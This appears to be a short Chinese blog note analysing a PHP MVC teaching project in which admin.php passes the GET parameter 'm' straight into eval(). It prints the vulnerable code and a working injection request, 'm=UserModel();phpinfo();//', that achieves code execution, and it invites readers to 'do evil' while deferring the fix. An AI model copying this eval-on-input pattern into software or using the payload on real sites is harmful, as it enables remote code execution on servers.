在VeryCD上下载量还挺高的，看说明是老师为了介绍MVC而做的一个例子，从开发的角度来说，本身还是不错的。不过为了图方便，忽视了一些东西，这里小文一篇，是为笔记。

  什么是MVC这里就不说了？为了实现单一入口，通常所有的动作(Control)都从一个文件出发。我们来看看他这里是怎么写的(位于根目录下的admin.php)：

<?PHP
    require(‘init.php’);
    eval(‘$action=new ‘.ucfirst(isset($_GET["m"])?$_GET["m"]:"index")."Action();");
    $action->run();

?>

说明一下，这里包含的init.php文件的主要功能是利用PHP的魔术方法__autoload()来自动载入类文件。于是便有了后面的 $action = new SomeAction(); 这一句来实例化一个动作类。但是很遗憾的是，他为了图方便，而直接使用了eval函数。

“任何输入都是有害的”这句名言在此刻又闪耀出它的光芒~

new后面的字符是通过GET方式传入的,这里的数据输入就是由我控制的,于是可以这样请求

admin.php?m = xxxxx

然后发挥你邪恶的想象力,来做点邪恶的事情吧.

同时找到他存在一个叫UserModel的类.我们可以这样构造

admin.php?m = UserModel();phpinfo();//

于是我们eval中执行的语句变成了

$action=new UserModel();phpinfo();// Action();

代码执行如此产生了.修补方法下次再说..只是觉得培训机构这样出类似的教程教程序ctrl + c 或者 ctrl + v 是很伤的。 hv fun